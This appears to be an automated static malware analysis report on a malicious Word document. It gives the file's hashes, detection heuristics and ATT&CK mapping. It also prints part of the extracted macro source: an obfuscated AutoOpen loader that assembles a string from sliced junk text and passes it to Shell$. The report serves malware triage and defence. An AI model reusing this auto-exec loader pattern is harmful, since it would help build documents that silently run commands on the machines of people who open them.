Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b42017e56fdb7e53…

MALICIOUS

Office (OLE)

128.5 KB Created: 2017-11-21 05:20:00 Authoring application: Microsoft Office Word First seen: 2017-11-29
MD5: e660940388357227c8089d4e92cccd01 SHA-1: f1be1b17f6ab3954a576a96d9f9b43ae2b2064e0 SHA-256: b42017e56fdb7e53bdf662d325d8ea44d68094c45a842d051b7bee70ca098a12
304 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing obfuscated VBA macros. The AutoOpen macro triggers the execution of a Shell() call, which is a critical finding. The presence of an obfuscated auto-exec loader and VBA p-code execution further indicates malicious intent. The primary IOC is the macros.bas file, which contains the malicious VBA code.

Heuristics 9

  • ClamAV: Doc.Macro.Obfuscation-6355576-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6355576-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 137053 bytes
SHA-256: 12e42775cdc437ce97d903bdd78843cbf0dd8f81079a5d95d846762ef5a80272
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 80 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "JNLpJdWja"
Sub AutoOpen()
ssiskJaol = Array("EPcMbUoc", "BCXcijsf", "FZJbzCXj", "ZTQQjzWV", "QrzjQRKC")
NwrQNGKIm = Array("NijRNlCs", "wmIEXtCj", "BLqkLPnP", "HNBKHTSJ", "HiWUmECG")
woUiBwqFp = Array("kLvTYazr", "UKAjrlcT", "wwsWhtzI", "knXvINJW", "wVXIXpjE")
Shell$ SKGtwwOPi, 0
YdSuCWEDr = Array("KCBziHqN", "mjlCCiGA", "dnWOUwJN", "owEbDGNi", "UDzLHZON")
julGzBVvM = Array("tYjioXOt", "oIjDPKfW", "CizkvtEZ", "JhaKCPmd", "JOJiizfj")
jRSQiJRjG = Array("kuTWKRzT", "JZHwEqZW", "GuABwrDC", "SBdanuzQ", "qDSUSHwz")
End Sub
Function SKGtwwOPi()
qZjllWbH = "i0b0oFtCIn0F9BKltNmhTawDWiUbNKDhSYVbjfohfmlcJHRcwSJZiJbQwbFCXWZACtfNNiENZEBjpVtPQrfvBiDJzEfFZlJJNlaQbEPSNvzZHubbiqljqdwXpVQIwzonusTEucnMcNhFfdCCdDWiAdSjmDbGnGTOHMiPaWjFDZDdwtsLTNivcFnRakRrBjYz5"
wwlwoZYChm = Mid(qZjllWbH, 16, 176)
SINSRvZsDL = Array("mbSIXMHV", "FzOwrQFJ", "vvuQLJZl", "pUREwMjR", "jhcbbVaa")
rrqnmNIzt = Array("KkRjSUwd", "ThDwSLNc", "BhTCuDWt", "QwQKoiha", "UTFasqSU")
FbwpJzciZ = "tNC2Z1jkosvqpjwKnHAUGmPsoYinGQUKPiIJsYlRHIqiLBYQJRkhhnVXJfhhZbiXYkaLYntOTTbD9ANdibaWDX2fPJiiMs9Sm0VIKj"
pRMwWaKBHE = Mid(FbwpJzciZ, 8, 63)
iDtOPVzl = Array("wwpoEnYw", "nwMUXwRi", "zvRiIzOi", "POfCsapJ", "lnXHwAlM")
UOjavKOE = Array("FfLHZPoS", "hwGWnHXw", "hGZpHVDN", "ICikYJkz", "KEYcoGIz")
AiLbCtm = "w61J8bjPnIXZPhOZsjXQYzdQmhkAFkwJmmiBrWahaTvmajmYPDqDwcNYlaRBPjKCMNmczNiVGpqECrpGvOrt37ccpbhKswot5M4kZ"
bXfcPUmLifU = Mid(AiLbCtm, 7, 75)
OdBFEbZ = Array("hEUzjsYP", "AoApHlTW", "TwiMGmvT", "OztAfJkU", "EIpcjtpU")
iqUXA = Array("jwiuvUSM", "GtbDYhju", "IBljzXjq", "EflwvrnZ", "HOdJDBYt")
lPkDIbV = "7jGwRSOViMzvljnAOiojndcJkzMrDrjiTFaaNrVwWLwaXcYwuhLwprlHwBnoFXSrfTcfGMmWIqJbiBlIaOwVjjpbUScLEhtztHuEAtsiuoozhJdwPfNrawKwiBKnjbRawKhXGhHhVObrvqtKpfvZUBYwwwZzi2sOmPJB"
wTfomdREFJz = Mid(lPkDIbV, 6, 151)
qbdPX = Array("kOZAXEQB", "sQvLKIKN", "PijflkSw", "DMFRECiQ", "jTfUtQsB")
QrDIlbQOF = Array("muRnijwU", "jnDwQdlz", "vbzKzzwq", "ifbrcqUw", "lftqTfUW")
oiDYYXjPNW = "TwshpVbiSDrjYpkhFEmSmUjQbltCLfdQkUwLQFSZoARJHiQJSCiTWFAOHbGEbYWnabzEsZQAmNilDaJsUjjIwKtiTiDpwOwPdijjiLRslhjJbOLhSOjrpOqPhUlJWbCYOOHZrdJJSqWOdjDEXVXkiGaPnTwNaHWKfIuMHmpoEaZwrblzRjmAdc3j3szXZzuHH"
CCzwUOb = Mid(oiDYYXjPNW, 3, 178)
GkfoEt = Array("iWJwRBfE", "iGssZVSL", "stzvXPUn", "AILsnlWT", "kHUivvZR")
vvTKKRYwn = Array("ZIGiCnql", "IiXWhvaP", "BWvJpmQs", "jYHSAjQw", "TjWOJqkM")
dGMzd = "VUaAj9r8THQjMkBusLKZKPQEYRtJsaMtJZCUUzImIWulLGDwIITCcDozSRiXzvJQcMmnijZvCYQnVftROzAkGKQFkFCDOkpNMdIwUPOciYzEnBbnXQJzuZKSwjDciWjRiCbsWuzwiYBiKMSjiOfwbpSmTqCnMlwMriV1Fcz"
vYEjRPCYK = Mid(dGMzd, 13, 151)
FTsJOBpiEr = Array("mRlvBrwC", "EjWwwGfs", "oLnozlQV", "zXmQYLkj", "jLqPmpXa")
rINHL = Array("dAzpoINf", "DzbpYplB", "BQviEfis", "wqMkQQFz", "oMKznajq")
kkPma = "D7B7FOokBjjnpSSdbHvzaiMjiHSMktLMpaTzzSwBRjCQmdCmqoYLUPdATAKwwbAHYUwOzUjIJuhrjvtFEfWwUzrZzSiwHzEqiusSionVIPCZimUXHFuQEEnYcZRjpjAKqrIlDaaPsAnFzSrKwHoCEoliHUqFXGfYOsjqdiUjifYDQhbJiGiiuwFBFddjkVslVPqEjAtOww09oln0w81HH7RfuZisA3uwtdi"
wORifBLJOCQ = Mid(kkPma, 5, 194)
kQBNa = Array("jTLaCjFv", "rMbijivh", "sajItvOl", "bnnoYYfQ", "zmOcRokJ")
mdtYm = Array("VFUSNirA", "KnEsYwKn", "EazOvRWS", "hKlwTSPE", "pWmobwXw")
rqMNMHhnz = "V6iEwTWNCXcFqiXfVLVSBnHzwEfsGulkaIHIzRPHVhnVikpNCojNbiwlriGuniHHlrihaOjEwNzUzlROOSqROYJwLVRQKVUrZjkrFInnIbQOhclFRsfUnqsMhhVEwPtbtFuTBZIGfCJnHuPjjMzSpzDjoXJXmirOnjiRo4DvzfMMzSuErD0bv1LahXAj1QRY"
ziKRS = Mid(rqMNMHhnz, 3, 157)
jhnvVszNlGs = Array("SlTsuXPS", "IiFYLUCB", "GmNUjqnG", "PPolDFRz", "EplIbozz")
bpvmAi = Array("jktcQnzh", "ARCAXcLb", "zMdiiiOC", "RIUVjuaS", "pOlzwLqc")
zqwbGO = "Z6rUtYrzrMcY8YfU1Z"
LKKMhjwV = Mid(zqwbGO, 5, 8)
WkjdL = Array("htrajLHW", "zjdEzjJq", "IiwRFRjR", "dXsJGpLt", "qKZZjXWf")
jkGJJiJQGY = Array("dpLLjann", "rVTPjivQ", "JazMTzPH", "UkOpJkHk", "HQoQFYiC")
cvOCrjQO = "YfdhLuqFhuui543AE8D4Idk5qN3AR9kZiRdT
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.